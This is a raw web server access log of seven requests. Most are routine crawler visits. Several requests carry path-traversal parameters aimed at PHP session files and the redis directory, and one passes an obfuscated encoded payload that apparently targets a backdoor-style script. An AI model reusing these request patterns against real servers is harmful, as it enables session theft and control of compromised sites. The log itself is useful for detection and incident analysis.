57.141.20.59 - - [13/Jan/2026:07:00:06 +0300] "GET /?product=1867097802 HTTP/1.0" 500 185 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
66.249.76.128 - - [13/Jan/2026:07:00:06 +0300] "GET /?product=891473343 HTTP/1.0" 200 25783 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.215 - - [13/Jan/2026:07:00:09 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_b6c48b4e77e72ed3eb743202fc8be924 HTTP/1.0" 200 1630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:54:50 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383238303039302p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363439302q3564653132313463363333386337396363356663363333613134633338303836222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
66.249.73.64 - - [13/Jan/2026:07:00:10 +0300] "GET /?product=872448675 HTTP/1.0" 200 25038 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.215 - - [13/Jan/2026:07:00:12 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Flib%2F..%2Flib%2Fredis HTTP/1.0" 200 1916 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:07:00:15 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_63f8d0a61548cb5635d72c87d51fa121 HTTP/1.0" 200 1631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
